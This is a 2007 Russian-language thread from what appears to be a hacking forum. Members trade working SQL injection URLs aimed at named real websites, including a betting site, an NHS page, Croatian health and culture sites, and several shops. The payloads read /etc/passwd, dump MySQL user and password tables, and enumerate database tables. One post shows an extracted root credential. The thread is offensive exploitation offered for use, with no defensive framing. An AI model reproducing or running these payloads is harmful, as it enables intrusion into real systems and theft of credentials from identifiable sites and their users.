04.04.2007, 13:57
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
ну да, видно тут какая-то своя криптовка пасса...
|
|
|
04.04.2007, 14:08
|
|
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081
Репутация:
20
|
|
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*
Помогите ка раскачать
|
|
|
|
04.04.2007, 14:35
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*
Помогите ка раскачать
/etc/passwd
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*
MySQL root (видимо без пасса)
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*
Последний раз редактировалось maxster; 04.04.2007 в 14:39..
|
|
|
|
04.04.2007, 14:53
|
|
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081
Репутация:
20
|
|
Сообщение от maxster
/etc/passwd
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*
MySQL root (видимо без пасса)
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*
Не понял etc/passwd а что дальше то.  сорри
|
|
|
|
04.04.2007, 16:04
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Еще один магазин. Таблица users, а выводит, по всей видимости, названия моделей =(
http://www.provideo.ru/index.php?action=list&page=1&category=-51+union+select+1,password+from+users+limit+0,1/*&f=c
|
|
|
|
04.04.2007, 16:06
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Одна из идеальных =)
Код:
http://www.immunisation.nhs.uk/article.php?id=9999999'+union+select+1,2,concat_ws(char(58),name,username,password),concat(version(),char(58),user()),5,6,7,8,9+from+user+limit+2,2/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
04.04.2007, 16:32
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
Код:
http://www.hnk.hr/hr/predstava.php?id=-18+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password),0x71),0x71),10,11,12,13,14,15+from+users/*
Код:
http://www.gamer.hr/najave/swat4_ssynd.php?id=-210%20UNION%20SELECT%201,concat(email,0x3a,password),3,4,5,6,7,8,9+from+user+limit+3,1/*
|
|
|
|
04.04.2007, 16:51
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(name,char(58),pwd,char(58),command,char(58),email,char(58),url,char(58),country,char(58),city),char),5,6+from+users+limit+0,1/*
А вот эта может уже и была...
Код:
http://www.web-segment.ru/index.php?p=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15/*
|
|
|
|
04.04.2007, 17:08
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Код:
http://c82.net/article.php?ID=-25+union+select+concat(version(),char(58),user()),2,3,4/*
чет с таблицами не получилось =\
+
Код:
http://www.dukemednews.org/news/article.php?id=-6041+union+select+concat(user,char(58),password),2,3,4,5,version(),7,8+from+mysql.user/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 04.04.2007 в 17:25..
|
|
|
|
04.04.2007, 17:56
|
|
Познающий
Регистрация: 10.02.2006
Сообщений: 88
Провел на форуме:
574349
Репутация:
8
|
|
Код:
http://freejob.ru/message_to_vacancy.php?id_m=-1'+UNION+SELECT+1,2,3,4,5,6,7,concat(user,0x3a,password),9,11,12,13,14,15,16,17,18,19,20+FROM+mysql.user/*
root:nhfdthcf |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
